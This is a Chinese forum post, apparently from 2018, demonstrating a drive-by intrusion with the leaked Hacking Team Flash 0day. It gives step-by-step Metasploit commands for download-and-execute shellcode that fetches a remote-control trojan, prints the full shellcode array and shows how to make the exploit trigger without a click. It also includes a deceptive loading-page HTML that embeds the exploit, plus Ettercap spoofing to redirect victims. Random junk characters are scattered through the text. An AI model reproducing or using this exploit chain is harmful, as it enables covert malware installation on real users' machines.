|
8 K, T0 [4 x: E, E
三、flash 0day之手工代码修改制作下载者实例入侵演示 ) [. a- P7 ~0 t& U% v% H: P+ o
! _" ?: L' z' H' i) D) l
& H4 i* |. A& I! R" b! M! B
利用到的工具: ) f; {! h& i! ?+ t
$ l* Y8 L; O, V# ~% B2 s
$ ]3 Z) D- m6 x# C' [
Msf ; C4 t3 i) ]: c9 T4 q: H9 B
; E7 C6 `' ?& L) x
8 C! }5 D: C* }. d2 f
Ettercap
: V; x/ j+ G# I- I2 g3 u" C - t+ I6 K: z1 W: v2 J6 `2 ~
; }0 I, ^ v# L2 V. e1 c+ F/ u9 }
Adobe Flash CS6
& K5 q& t* k0 O4 ] # y; W4 ?8 @, M/ c
% G* d3 m0 \8 U( l
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
- k! n/ ]& U9 n' C* o( [9 h1 E5 P
: V4 ^0 n0 ]8 i9 @2 Y9 B, t$ J
% a/ R! Y% M( J 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 3 i( ?! H( k8 f
# D4 q; a8 b! a
8 l' o5 ]* [% k, p 如图:
2 u8 v! U6 ]4 `+ @7 m3 ~# u; n; z $ z8 i w3 i7 w) O4 ]
7 P% x% E; t5 q & ]2 O6 P7 v+ w+ s% t5 m
* h9 A! a2 W" `8 Y7 u: u
$ \ Y+ L8 `, r, \
 3 ?% V& f/ q9 P( Z0 q
/ X& s# C6 ]+ r, W8 K( y/ R3 P+ g5 e. e6 }2 m
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
# B: o2 T$ x6 q: J5 [/ K5 E9 `/ y& X, g 4 t) \, k6 m q7 P! x, }
1 J1 K' j# t/ J2 ]# l
3 O$ ]. B j; g* K8 K
8 n5 r/ m( `5 T, J6 B
. X8 @/ ^) \ z+ z) s6 M 
+ q/ S/ s% U' m( X8 M
/ X6 t+ ~. I+ v/ F/ X! ]1 P, M2 {: n
, F) O/ Q1 J$ i8 D9 ~ 然后执行generate -t dword生成shellcode,如下:
9 m2 ~0 Q1 v& H! z! K 2 R5 h) v2 E4 Z$ S( W& O8 {- a
6 Z& w( L) j3 c3 k5 W# q/ D- D* Z 
' p% _1 o: s7 N1 m
: Z" \% K* b2 f5 v6 N) F8 ^
: U8 `" x1 |1 s: Y2 N: t" V Z 复制代码到文本下便于我们一会编辑flash exp,如下: ( Y, t6 F) c9 L
8 c+ h6 D6 _; ^1 a" {! u _' i
" W. D; Q* _& L9 @8 | 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 8 U. r! u/ O0 E8 n9 s2 P
* @9 O5 G( ~9 H) B% {" ?# |" t9 Z0 c' Y) Q" {, V+ L
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, 5 u+ g" g' |! ~
- W, z* t3 s4 ^
( V4 Z* \+ I( L7 _, U9 D- O6 s, P 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ; F g4 w# W7 O% I$ L
0 N0 P& c4 P z6 h7 X2 R) X I; P# l
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
; y T& j7 y _
! ]* Z K6 n* L j2 j4 ~# Z- s4 J% E, L* x/ N8 Z
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
( P$ }; Y; m9 r" a) d0 r) M* B. O . ] h& e1 |# G' G; f
! W$ x3 h! f2 S Q3 V- ^. |! q 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
- J7 M# J- f+ E* ^( i + O9 | P5 @2 ~/ N
8 ]7 o, i8 g4 R# c
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
% t# T0 J4 C0 M v$ ^' D" Q2 N. l, q " L$ J# w6 s) L. p- L/ _
- k2 O9 F) F, |: A: u. ?
0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 3 n; K1 z5 c0 p. m( ?0 ?8 e
% X2 N( J# J/ y0 v' m& T# ^/ j0 k, d: M5 A* c
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, , t0 N, I2 }2 q) ^
# b% T8 X" d ~* u& y1 |
5 q0 c3 _4 \7 u 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
( j4 f/ W2 y- n
. V1 A& X! h8 |4 `5 l0 |) w1 n) q1 L4 @& l8 g1 W; b- d8 y9 l3 B
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 3 _) ^# s( a2 R
4 V$ a o# T; f2 W3 s. m
b8 D% D5 Q6 z 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
% e( M' L' d/ E) J# U' R C( E r5 m' \1 i% A6 @+ J
& C R2 y% C/ r6 t q, }
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, 0 ]0 D9 m6 w+ R
- I7 N3 W L! g* n; E
% Z1 o- a$ c; L( b
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 ! ~1 c7 r1 D- X
* N8 ]( \5 R( e) d# } U7 R1 m6 h' L4 }" Z4 M
8 P6 t" a! F& }8 Q* H
" G$ S0 Y8 |0 h6 E( x5 s8 J. j; T% T8 Q7 b6 t
) r+ `1 c- A0 G. q
( M4 U7 O+ N* n* l1 v% i
! A7 Z( ]2 e) x 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
( F% {2 {, s$ G) E
6 E- q$ G$ y6 w# e3 d
$ n0 k4 e. ? [3 b% c 
5 f, V* W" O! {0 d' @ T
' w' s) {0 k# p0 M: Y4 K
6 `; U1 d! A6 a3 O( _0 R 先修改ShellWin32.as,部分源代码如图:
' p# u& O2 F7 S) q
* Y0 O$ A* L) |; @
4 V3 t) F! T! h% Y/ q! {1 P) w  - u3 v9 H0 r& a) K/ O
* y2 _6 S. f' O3 Y! @% C" S
5 p, e; T$ }; ~( J 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
- w: x1 Q. v& w4 K / r* d$ J0 S1 L# r7 \. y; M
- n1 c, D4 r ^/ S, |
 V- O" N) [% t5 i5 t3 X( d
, O2 b5 U. X( X# Z* K
; R' L$ ?8 E7 V1 S6 A0 ^ 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ( L6 N/ z3 f) h
, q4 w% |( \2 C* v
0 U/ `1 y. m( c6 q! h- ~ C5 R
 & A% ]. l6 Y/ a2 {* d( p$ _
4 k$ e$ d3 Q6 z& H2 x: M( t
9 T; ? k7 F) i' L 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: " @& O2 d) A3 n: k$ Y/ V4 T
% v d" z3 O5 }* f
- R, ~, j3 _7 R+ k! ^
p- J. R" I1 P # S4 ?/ `/ _) w2 V$ D
& l: M( g' V& H! I) ?- u& P8 e$ R
/ m* S$ @3 H3 {" u% y4 a3 y' |
. s+ S2 ^$ p! t6 F7 r0 m) o8 G2 z X* Y: M8 q
4 H/ V/ b/ f+ q/ I$ ~ u , B# o3 l- N1 n
5 U; `! M5 E& W# p% Z6 ]! D7 }/ o( l* q
然后点保存,下面我们来编译一下,打开
( K! @! {" n; {, G* O8 ~ " c: T4 v, {" b1 r
# _: G% }8 o. B; o0 V. C exp1.fla然后点文件-发布,看看编译没错误
" a2 N9 e! Y- p) A
6 {' U# }8 Q$ j: N3 O$ z" k
! @3 g1 m( u& i 1 V* o. z! N3 {% R
" O3 U/ P7 E1 S. X
# g8 ^1 `: Q/ Y0 X, `, I
6 E* U. y6 ^' s
" f {* |$ Z' p- ?% d) ~. V% d4 Y3 F0 Y, i3 j# v
' y9 w, A& p" [, E1 ?3 u - S* f b7 o' T2 {+ X
. A( a9 d9 @( U  7 @, y: _/ p9 Y. n" s
# ^ f+ W" z) M6 [) \# s4 _0 U. I: ~* z* z e$ a
然后我们把生成的 8 ~8 v, ]9 P8 w7 h
4 ~5 E+ ?$ m7 z) {/ z; ?) M
. Q* ?$ W0 }# X6 H8 q- f& T exp1.swf丢到kailinux 的/var/www/html下:
* x) ^4 r. @% Z) B5 S. X& B
4 C+ q9 W* { y: {" V% E
2 Y6 U' C, Q& L8 Z5 X" ] 然后把这段代码好好编辑一下
- E7 C B, E6 B5 @
3 M( L5 D# a) x4 T- Y
$ v) [/ S( k* T% Q( Z9 J# Z 3 X0 ^, C; Y5 j
. z8 c* H9 q) K! r" O/ c: L
: ]# R% t. J7 ?: m8 @; d6 y
8 g: R8 ^( l# G: a" [
9 B$ L' Y# P/ M6 ~' C
$ }9 o: w( R4 G V% ?
2 s7 _. J. [9 w6 x4 D) Y $ J8 E% M! a1 o1 O5 L% w
/ |3 ~( W" O5 _, z& y" A8 C. b 6 \8 T( d, D* \0 k- o' c
$ g: |/ H5 l& O1 }1 y9 o7 E
# C" A4 z' P' I+ I0 T4 Z$ Q * d7 l( F I* Y- P
0 W5 J) Q! j" ^ Q6 b
) I. f$ G3 d( }- w2 s2 E
+ i% Q* D* T0 h! `+ _1 H& o: X Q3 X
% c$ _; I$ ]0 @$ r! o, ]9 ?6 `% |/ C0 W# F! A8 j! x. @
<!DOCTYPE html> ' N5 `+ F& |! C6 ]/ B
2 U9 `: h" I9 M
9 W' Z- S! R9 p7 n; v, _) }% N* z. S <html>
& E! g' Y) {+ }6 H6 q5 O
6 O t& [1 Q" C# L% ]7 v q
- X. c7 h0 q0 j' v! n: K <head>
6 |- k0 o+ w2 F% [+ s ( C% T6 B+ y$ x& t* z4 x
' f% J$ [$ A& T, U1 j9 A <meta http-equiv="Content-Type" content="text/html;
k& t5 h) b F4 P; e* W1 Q; l " R, n* K* Y( s# c; E* V; L- T
5 x4 k" ^; H3 X1 Q5 D% {* T2 n charset=utf-8"/>
. q7 v3 D) f K0 P. x- f / Y( o$ b# E8 q' h8 q, N
! N/ _# i, T, e </head>
+ S, A( s6 x$ g1 e* n7 }, b
5 [+ ^8 o" }& v: N( d6 r
" Z2 b6 `/ t' q9 \( L! H <body>
3 \. {0 j( j4 j1 q6 X 6 l5 J! H! v* G' |1 o. R- u9 o5 o
: M t2 O8 h* a8 | r: p <h2> Please wait, the requested page is loading...</h2> 0 i! y/ p- S% j" v" v4 _! F
% H- x k( y' `# K& _8 ?7 Y4 y7 u4 E3 {. U) }5 x& t! d
<br>
) m k7 l9 v0 q4 j8 b 5 {) Y6 Z4 \. f
' l2 N+ W1 ~8 p
<OBJECT
& F9 `$ }) @) ? Z* M
8 z; Z' P9 l" v8 U; n. U6 a
& x( Q4 a, e1 v8 R! x: P0 L# c, | classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
8 k+ Q6 b1 n. _5 H9 ~8 d. m2 ?& R ' m+ C$ ?; K& g0 i- q$ i3 ~3 s
* Q! B! w0 A c: h1 T
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
6 N4 r3 Q6 v e+ Z2 c5 b
4 b' W% A* o! T+ c' [( J9 ^* e3 f& G8 g5 }5 z
</body>
$ X/ H/ _" P- ^ O9 {6 e' I ; m# \; v0 h2 n; C2 l9 i% J
" }& a1 L# }- t: Q9 A <script>
5 g, T6 v6 R/ m! W1 b# O : g, V4 x; b. e4 _& g
, z, \; q8 o: t6 A7 s) T0 O
setTimeout(function () {
4 y, X R. @2 Y 8 Q, _2 y& p/ v) Y1 R/ t2 L2 `, y' n, V
% Z2 n3 p- l3 o, ]" G( W6 V
- s2 r, N: i$ D5 ^
4 P: A' C3 A! D
1 r' H( _$ G! w3 J window.location.reload(); + _7 G5 L: [+ }# ]6 u7 q
" ]- Q' u$ h) r# J- Q9 V# [/ Y) T/ }* y( a
}, 10000); ! |0 f/ q5 D/ U! A7 I
6 \1 S6 D5 W8 \3 B& I$ h# w' J/ |8 V; {
' R" d" S8 d1 u! l( o, [( B 4 v1 u. |3 k, J9 l$ Z" @
9 A' V8 Y W( ~% i6 f D! I u </script> O) Z8 B$ e/ R
/ b: T% b9 R, x
* ~5 y/ p, g0 z& P
</html> ) y9 q3 f# N# I
* s c. c$ ]$ h4 `' p+ M3 H9 P3 ?( u1 s
# R' o. n% K. n
- \2 O# E5 R. J1 D3 O' t3 n
# ]) ?4 f- u# I: q/ O$ v* r- V0 J 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图:
* N, l1 K H4 w: J2 v) a: l
) s( h( }3 R7 B2 ^! k$ I& w; K& T8 `* x# P
 ; B, T0 D& o" d: ]" B" Z+ Z
1 }& T: C' I2 k2 B; l, P# v5 ?6 F. ^$ U$ x6 i; O6 r* ?7 l0 x) ~
8 f# T/ a' d* H$ r6 Z
) z q' U5 e& A% b. v" I' f! m4 p5 v" g0 d# Y+ c
0 C) T( u1 u- e
* [1 l0 x/ A% t. n4 F
# T/ {2 i- e1 X1 O0 d" q' b
8 C3 C7 X9 D$ t1 _/ h2 f
0 N6 n/ S; T/ K2 M/ C1 W: a! C& ^$ ~" R+ E& d/ S
3 x. ~" Q1 ?6 G( u8 J r0 H* c1 ^5 ?
9 ]9 K% v. E, u5 R9 D: h
下面我们用ettercap欺骗如图: " [7 u5 b/ D# f# R
( A" V, h7 U: X. L6 I/ d! n
4 T+ y( \' D3 | D T6 W0 M. T5 s 
7 Q8 A$ m3 d# q 0 H7 R& a+ B9 v% X* d
3 Y7 w: }+ C, r2 B , _" @. U3 J3 t. e" p4 q: D
+ F* \2 ?, H) L9 a; }* k! Z
* Q0 x( b6 m* U- H$ ]0 G; j 下面我们随便访问个网站看看: o/ F0 j) E9 N5 |1 R& f
7 A$ b* p4 ?" Y* h, \3 p0 Y- t
3 E. s1 S& I' e3 C 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
/ j/ h7 i# c( ]2 P3 z4 W + O, \( Q6 B5 T" g4 Y0 r# d; y$ B
7 r$ I+ ^( k% q5 r9 I) m 
/ R! e5 q- p% W! y* y& |) a+ d ' S0 }; ~ o, D( |
! _% j% ~. v* ~. L
我们看另一台, 4 g K* t$ L9 O( I3 w9 @
- Z, D, b& V# B0 D- t3 ?* x7 n, Y* g
1 U" y9 o. r# D4 M5 e
提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 2 n o2 l/ T; d1 P
| 
发表于 2018-10-20 20:28:55
收藏
支持
反对